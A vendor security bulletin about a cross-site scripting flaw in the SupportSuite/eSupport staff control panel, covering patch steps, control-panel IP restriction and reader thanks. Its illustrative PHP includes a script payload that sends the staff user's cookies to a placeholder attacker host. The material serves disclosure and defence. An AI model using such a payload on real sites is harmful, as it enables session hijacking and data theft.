Security bulletin – SupportSuite and eSupport

A recently discovered, potentially exploitable cross-site scripting (XSS) vulnerability in the staff control panel means that we have had to release an out-of-cycle patch to our customers.

Who needs to apply the patch

All customers running SupportSuite or eSupport 3.60.04 or earlier need to apply this patch as soon as possible.

About the flaw

The flaw can only be triggered in the context of a fully authenticated staff user. That does not make it harmless: with cross-site scripting, an attacker can send one of your staff users a legitimate-looking link which, when clicked while they are logged in, runs the attacker's script inside the staff control panel and can leak information such as the staff user's session data and cookie data.
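To make the "legitimate looking link" concrete, here is a generic illustration of a reflected XSS in a staff-facing page and of the same page with output encoding applied. It is an added example written for this bulletin; it is not Kayako's code, not the contents of the patched file, and says nothing about where the real flaw was. The function names, the request parameter and the attacker hostname are all made up.

```php
<?php
// Added illustration, not Kayako's code and not the patched file: a generic
// reflected XSS in a hypothetical staff search page, next to the same page
// with output encoding applied. Function names are made up for the example.

// Vulnerable: an untrusted request parameter is concatenated into HTML as-is,
// so any markup it contains is parsed and executed by the staff user's browser.
function render_search_vulnerable(string $subject): string
{
    return '<h2>Tickets matching: ' . $subject . '</h2>';
}

// Hardened: encode the value for an HTML text context before emitting it.
// ENT_QUOTES also encodes quotes, so the same helper is safe inside attributes.
function render_search_hardened(string $subject): string
{
    $safe = htmlspecialchars($subject, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h2>Tickets matching: ' . $safe . '</h2>';
}

// Constructed payload of the kind a "legitimate looking link" could carry in
// its query string (the hostname is a placeholder): it ships the victim's
// cookies to a host the attacker controls.
$payload = '<script>new Image().src="http://attacker.example/?c="'
         . '+encodeURIComponent(document.cookie)</script>';

// In the vulnerable page the <script> element survives intact and runs with
// the logged-in staff user's session; in the hardened page the angle brackets
// are encoded and the browser shows the payload as plain text.
echo render_search_vulnerable($payload), "\n";
echo render_search_hardened($payload), "\n";
```

Two things worth keeping in mind when reviewing your own templates: htmlspecialchars() is the right tool only for HTML body and attribute contexts (a value landing inside a JavaScript block or a URL needs encoding for that context instead), and marking the session cookie HttpOnly stops document.cookie from exposing it but does not stop the injected script from acting with the staff user's session, so encoding at output remains the actual fix.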

How to apply the patch

You only need to replace one file in your support desk installation.

  1. Visit the members’ area, click on the Patches tab.
  2. Download the patch file under the “30th September 2009 advisory” that corresponds to your SupportSuite or eSupport version.
    1. If you are running a version earlier than 3.11, you will need to perform a full upgrade to 3.60.04 first and then apply the patch.
  3. Extract the ZIP file; it contains “functions_ticketsui.php”.
  4. Upload this file to your support desk installation, replacing the existing file at ./modules/tickets/functions_ticketsui.php

It is important that all of our customers apply this patch as soon as possible.

If you need assistance applying the patch

Please do not hesitate to get in touch with us – we’ll be happy to help you apply the patch. Visit the members’ area, click on the Get Support tab to submit a support ticket.

Security housekeeping

Control panel IP restrictions

In 3.40.00, we added a feature which allows administrators to restrict which IP addresses can access the staff and administrator control panels. You can specify these IP addresses in the ./config/config.php file, as shown below.

/**
* ENABLE IP RESTRICTION: This option allows you to restrict the admin,staff,winapp,mobile,pda interfaces to a certain IP range
* 202.1.192.0-202.1.192.255: a range of IPs
* 200.36.161.0/24: a range of IP by using net masking
* 200.36.161/24: a shorten syntax similar to the above.
* Example: $_SWIFT['iprestrict'] = array('202.1.192.0-202.1.192.255', '200.36.161.0/24');
*/
$_SWIFT['iprestrict'] = array();

If you can isolate control panel logins to a known set of IP addresses, we highly recommend doing so: if a staff user's login details are ever compromised, the attacker will still not be able to log in to your control panels from any IP address other than those you specify.
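The config comment above lists three address syntaxes without saying how they are matched. The following is an added example, written for this bulletin and not Kayako's own implementation, of a checker that accepts all three (an explicit range, CIDR notation, and the shortened CIDR form) and decides whether a client address is allowed. The function names are hypothetical, and it assumes PHP 7.1 or later on a 64-bit build, where ip2long() returns non-negative integers.

```php
<?php
// Added example (not Kayako's code): a checker for the three address syntaxes
// documented for $_SWIFT['iprestrict']. Function names are hypothetical.
// Assumes 64-bit PHP integers so ip2long() results compare as unsigned values.

function ip_in_entry(string $ip, string $entry): bool
{
    $ipLong = ip2long($ip);
    if ($ipLong === false) {
        return false;                       // malformed client address: deny
    }
    $entry = trim($entry);

    // 202.1.192.0-202.1.192.255: an explicit, inclusive range
    if (strpos($entry, '-') !== false) {
        [$lo, $hi] = array_map('trim', explode('-', $entry, 2));
        $loLong = ip2long($lo);
        $hiLong = ip2long($hi);
        if ($loLong === false || $hiLong === false) {
            return false;                   // malformed entry never matches
        }
        return $ipLong >= $loLong && $ipLong <= $hiLong;
    }

    // 200.36.161.0/24, or the shortened 200.36.161/24: CIDR notation
    if (strpos($entry, '/') !== false) {
        [$net, $bits] = explode('/', $entry, 2);
        $bits = (int) $bits;
        if ($bits < 0 || $bits > 32) {
            return false;
        }
        // Pad a shortened prefix such as "200.36.161" out to four octets.
        $octets = explode('.', $net);
        while (count($octets) < 4) {
            $octets[] = '0';
        }
        $netLong = ip2long(implode('.', $octets));
        if ($netLong === false) {
            return false;
        }
        $mask = $bits === 0 ? 0 : ((~0 << (32 - $bits)) & 0xFFFFFFFF);
        return ($ipLong & $mask) === ($netLong & $mask);
    }

    // A bare address: exact match only
    return ip2long($entry) === $ipLong;
}

function ip_allowed(string $ip, array $restrict): bool
{
    if ($restrict === []) {
        return true;                        // empty list: restriction disabled
    }
    foreach ($restrict as $entry) {
        if (ip_in_entry($ip, $entry)) {
            return true;
        }
    }
    return false;
}

// Usage with the configuration values from the bulletin's own example.
$_SWIFT['iprestrict'] = array('202.1.192.0-202.1.192.255', '200.36.161.0/24');

// REMOTE_ADDR is set by the web server from the TCP connection. Do not
// substitute X-Forwarded-For here unless a trusted proxy is the only thing
// that can reach this host, since that header is supplied by the client.
$client = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
if (!ip_allowed($client, $_SWIFT['iprestrict'])) {
    http_response_code(403);
    exit('Control panel access is not permitted from your address.');
}
```

One caveat when enabling the real setting: if your support desk sits behind a reverse proxy or load balancer, the address the application sees is the proxy's, so either every staff connection will be allowed or none will, depending on whether the proxy's address is in the list. Make sure the check is applied to the actual client address before relying on it.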

  • http://www.care.nl Joost Sanders

    Good to see you guys took our incident report seriously! And good work on bringing out a patch for it so quickly.

  • http://noblesamurai.com/ Arlen Cuss

    Thanks guys. :-)

  • Carlos Oliveros

    Thanks for the patch.

    Regards

  • http://www.webtuga.com cenourinha

    Patch applied.
    :)

  • Paul

    Your post says “eSupport 3.60.04 or earlier”, but this patch doesn’t work for 3.00.32. Please advise.

  • http://www.kayako.com Jamie Edwards

    @Paul – Visit the patch area again, try the patch for 3.11. If that doesn’t work, I am afraid you will need to upgrade (you really should, as you are exposed to many serious security vulnerabilities by running such an outdated version).

  • http://www.herbst.de/support/ Michael Rutkowski

    Thank you for the patch. Great that you look at XSS, because that's a huge problem for many sites!

    thx and regards,
    Michael

  • http://www.osop.com.pa Gustavo Ruiz

    Thanks for your help and updates guys!
